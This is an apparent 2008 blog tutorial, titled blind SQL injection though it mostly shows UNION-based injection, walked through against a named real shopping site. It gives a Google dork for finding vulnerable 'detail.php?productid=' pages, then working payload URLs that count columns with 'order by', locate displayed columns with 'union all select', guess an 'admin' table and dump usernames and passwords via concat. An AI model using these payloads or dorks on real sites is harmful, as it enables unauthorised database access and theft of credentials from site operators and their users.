Sunday, August 31, 2008

BLIND SQL INJECTION PART-1

Blind SQL injection is a class of attack against web applications.
With it you can pull many things out of the database behind a site, such as usernames, passwords, e-mail addresses and other useful data.

OK, first I'll explain why it's called blind.
In most cases you don't know the names of the tables and columns
where the data is (usernames, passwords, etc.), so you are guessing.
One caveat on the name: strictly, blind SQL injection means the page shows
no query output at all and you infer data one true/false answer at a time.
What is done below is really UNION-based injection, because the page prints
the query result straight onto the product page; the only blind part is guessing the names.

Next: how do you find sites that could be vulnerable?
Go to Google and type: inurl:"detail.php?productid="
Or use some other Google dork.
For this tutorial I used the dork above.
I tried blind SQL injection on this site:

http://www.sourcememory.com/
When you find a site, you have to check whether it is vulnerable.
After detail.php?productid= you type ' or -1
(I prefer the ').
Usually you get a response like this:

Error performing query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

That means the website is vulnerable: the parameter is pasted into the query text.
Note the \' in the message. It shows a backslash was put in front of the quote
before the query was built (magic_quotes or addslashes), but because productid
is compared as a number, none of the payloads below need a quote at all,
so that escaping does nothing to stop them.
So,lets get to work.
First we need to find the number of columns in the query.
We do it with order by [number], raising the number until it errors.
In the URL, write + instead of a space (the browser sends it as a space).
At the end of every payload put a comment marker so the rest of the original query is ignored: -- or /*
One caveat: MySQL only treats -- as a comment when a space follows it, so in a URL it is safer to write --+ or -- -; /* comments out everything up to a matching */, so it only works when nothing important follows.
I will try to see if the site has 10 columns:
http://www.sourcememory.com/detail.php?productid=-1+order+by+10--


It has at least 10 columns. I tried higher numbers,
and the final number of columns is 11.
What happens if we write 12 instead of 11?
We get this message:
Error performing query: Unknown column '12' in 'order clause'


So we know there are 11 columns.
Now we will see which of them are displayed on the page.
We do that with union all select, giving it the same number of columns
and a number in each position as a marker.
Using -1 as the productid matters here: no real product has that id,
so the only row the page gets is the one from our select.
It looks like this:
http://www.sourcememory.com/detail.php?productid=-1+union+all+select+1,2,3,4,5,6,7,8,9,10,11--

At the bottom of the page we see:

Product Name 3
Price $5
Product Description 4

That means columns 3, 4 and 5 are displayed: 3 as the product name, 4 as the description and 5 as the price.
A column whose marker never appears can't be used to read data directly.

Now we have to guess the name of the table where the user data is.
How do we do that?
After the column list, add from+[tablename].
Example:

http://www.sourcememory.com/detail.php?productid=-1+union+all+select+1,2,3,4,5,6,7,8,9,10,11+from+admin--
The result is the same page as with the query above.
That means the table exists, so we guessed the name right.
A wrong guess gives a "Table '...' doesn't exist" error instead of the product page.
Now we just have to guess the column name.

In
http://www.sourcememory.com/detail.php?productid=-1+union+all+select+1,2,3,4,5,6,7,8,9,10,11+from+admin--

the 3 will be changed, because column 3 is one of the displayed ones.
So instead of 3 we write a column name.
Example:

http://www.sourcememory.com/detail.php?productid=-1+union+all+select+1,2,username,4,5,6,7,8,9,10,11+from+admin--
And we got the username.
A wrong column name gives an "Unknown column" error, the same kind we saw with order by 12.
We use concat to display more data in the one slot (here username and password):
Example:

http://www.sourcememory.com/detail.php?productid=-1+union+all+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+admin--
And that's it.
Oh, one more thing:
0x3a is a hex literal for ":". It is used instead of ':' so the payload
contains no quote at all, which matters because we saw the application escapes quotes.
Also, what comes back in the password column is often a hash rather than the plain password.
----------------------------------------------
Let's repeat the basics:
order by - for finding the number of columns
union all select - for finding which columns are displayed
from [tablename] - reading data from some table
concat(a,0x3a,b) - reading two columns through one displayed slot
